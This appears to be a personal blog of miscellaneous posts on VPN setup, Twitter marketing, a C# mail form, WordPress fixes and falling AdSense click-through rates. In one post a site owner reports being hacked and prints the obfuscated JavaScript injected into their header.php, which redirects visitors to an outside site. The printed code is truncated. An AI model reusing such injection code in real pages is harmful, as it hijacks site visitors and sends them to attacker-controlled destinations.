I have been trying to setup a VPN connection between my home and office computer to make for easier off-site backups (for both home and office) but I’ve been unlucky thus far. I’m using DD-WRT on my home router and I’m trying to connect to that as a VPN from my office. Each time I try to connect, I get the following error:

Connecting to xxx.xxx.xxx.xxx using ‘WAN Miniport (PPTP)’…

Error 807: The network connection between your computer and the VPN server was interrupted. This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity. Please try to reconnect to the VPN server. If this problem persists, contact the VPN administrator and analyze the quality of network connectivity.

I found a couple different guides on how to setup DD-WRT routers and configure them to allow VPN access, but so far, those guides have not worked for me.

If anyone has had any success setting up a VPN using DD-WRT, is there something that I could be missing? Any suggestions would be helpful. Here’s the error screen that I’m getting:

If you’re looking for internet marketing, you’ve found the place to go. Most of the time, searching for a product or company or product can be difficult, but now it is much easier because information and reviews are more readily available. Just look for orange soda and orangesoda reviews to see what it is you’re looking to get. If that doesn’t make sense to you, you might want to consider what orange soda can do for you, besides rot your teeth. This may sound a bit funny, but orange soda can help grow your business believe it or not.

So when it comes time to increase your web presence and your search rankings, try looking at some orange soda reviews and you will find some very good results. There are not too many bad things that can be said about more traffic, more customers, and more sales. Right? Whether you’re looking for Search Engine Marketing (SEM), Search Engine Optimization (SEO) or even Pay Per Click Advertising (PPC), you will be able to find what you’re looking to with orange soda, just read some of the orange soda reviews to see what they’re all about.

The internet is a big place, make sure you have someone on your side, or at least read about some of the people and companies who may be able to help you.

Recently, a few of my clients have been using twitter to market their products and services. There’s been a bit of a learning curve for all those involved, but after awhile we seemed to start getting some decent response. Lot’s of followers are coming along, but not as much interaction as I would have hoped for though. I’d say about 0.5% of all of our followers actually engage in meaningful dialogue and “retweets”. Where we’ve gotten most of our response is by holding free giveaways. However, it seems that all the followers and retweets that we gain from these giveaways are just looking to get a free product, they don’t care what the product is, they just want to get something for free.

Any experience with twitter? And is it all just spam/junk traffic?

I’ve been trying to setup a web form to send mail using my google account, but I have repeatedly had no luck. I’ve found many posts about people who are having the same problems, but have yet to come across a viable solution. Here is the code, if you see something that is incorrect, please let me (and others) know how to fix it.

System.Net.Mail.MailMessage mail = new MailMessage();
mail.From = new MailAddress("no-reply@mydomain.com", "Do Not Reply");
mail.To.Add(new MailAddress("email@mydomain.com", "My Email"));
mail.Subject = "Email Subject";
mail.Body = message;
mail.IsBodyHtml = true;
mail.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.EnableSsl = true;
client.Port = 587;
client.Host = "smtp.google.com";
client.UseDefaultCredentials = false;
client.DeliveryMethod = SmtpDeliveryMethod.Network;
client.Credentials = new System.Net.NetworkCredential("no-reply@mydomain.com", "password");
client.Send(mail);

Almost all of us have been guilty of doing it. And depending on the hour, most of us hate it when it happens to us. You all know what I’m talking about… Drunk Dialing. It can’t be explained, but for some reason after too much beer or liquor, it always seems like a good idea to call people, sometimes people you haven’t talked to in years, or even people you haven’t ever talked to. Well if you ever have the need to drunk dial again, call The SofaKing, he is ready and willing to accept your drunk dials, and if you don’t want to get charged for long distance, just punch in your phone number and you’ll be connected free of charge. You can’t beat that! So next time you’re in the mood to drunk dial someone, make that someone The SofaKing – (530) SOFA-KNG – Call him up and leave him a voicemail.

Or, have The SofaKing call you:

Your info is safe with The SofaKing

I love giving gifts, and I love finding creative cards that are inventive, witty and funny. I recently came across You’re Welcome Cards – these cards are great! They can be given with a gift, and they can also be given after receiving a Thank You card. Either way, they are tons of fun, and always get a good laugh.

The nice thing about these You’re Welcome Cards is the fact that they’re not holiday specific (though I hope that the creators make some holiday specific versions). These cards can be giving at Christmas, for Birthdays, or just because. There is really no limit to giving these cards to someone. They’ve only got a handful of designs available, but give them a look - You’re bound to get a good laugh if you give these next time you give a gift!

I’ve been using Twitter Tools plugin with one of my WordPress blogs to update my WordPress with tweets and vice versa. Over the past few weeks, I recently realized that many of the posts that are created from my Twitter feed have had a “Missed Schedule” note on them. Basically what has been happening is the day/time comes and goes and the scheduled posts do not ever get published, hence the term Missed Schedule.

I’ve found a “fix” for this problem… actually, it’s much more of a workaround for this problem. Here’s what you need to do if you’re dealing with the same problem of your posts Missing Schedule:

  1. Open up any of the posts that have the Missing Schedule note on them.
  2. On the right hand side, in the publish window, change the Status from Scheduled to Draft.
  3. Click Publish. You’ll get a “Post draft updated” message.
  4. Click Publish again. You’ll get a “Post Published” message.

This workaround will work if you don’t have too many scheduled posts, or if you don’t mind a long tedious process. Luckily, I only had about 5 posts that were Missing Schedule, so I just went through and adjusted them manually. If you have more, I have read a few words about plugins that fix this problem, but I was a bit hesitant to try them.

If you happened to read my article about my Google AdSense CTR decreasing over the past few months, you may have been wondering why it was dropping so much. Well, I finally started looking into the code of my blog and I found that my site was hacked. The header.php file had some Javascript add/injected into it. The following is the code that was found in my header file:

<script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ

These bastards put some code into the header of my site that would end up redirecting all of my users after 5-15 seconds. Each time, I’d end up losing the traffic, and in turn, the potential for AdSense revenue. I thought that my decreasing Google AdSense CTR was just a sign of the time, turns out otherwise. It turns out my ads just weren’t being displayed long enough to be seen by my users. If they’re only displayed for a few seconds, the chances are they aren’t going to be viewed by as many users. I’ll be updating everyone on

Has anyone else had their WordPress site hacked like this before? Have you found out how the hackers got into your site?

2010 had been great in terms of AdSense revenue through the month of January, but once February rolled around, I noticed a huge drop in my CTR. In January 2009, my AdSense CTR for all of the sites I manage and work with was nearly double digits. I understand that this isn’t typical, but it had been like that for well over a year. Toward the end of 2o09. Over the past year, my CTR had fallen to about half of what it was, then in the past month, it’s fallen to about half of that. What gives? The site is the same, I still get the same amount off traffic, if not more, but my CTR is turning into garbage!

Update – CTR Problem Solved

I found out that my site was hacked. After about 10-15 seconds, my site would redirect based on some javascript code that was injected into it. Read more about how my WordPress was hacked, read here.
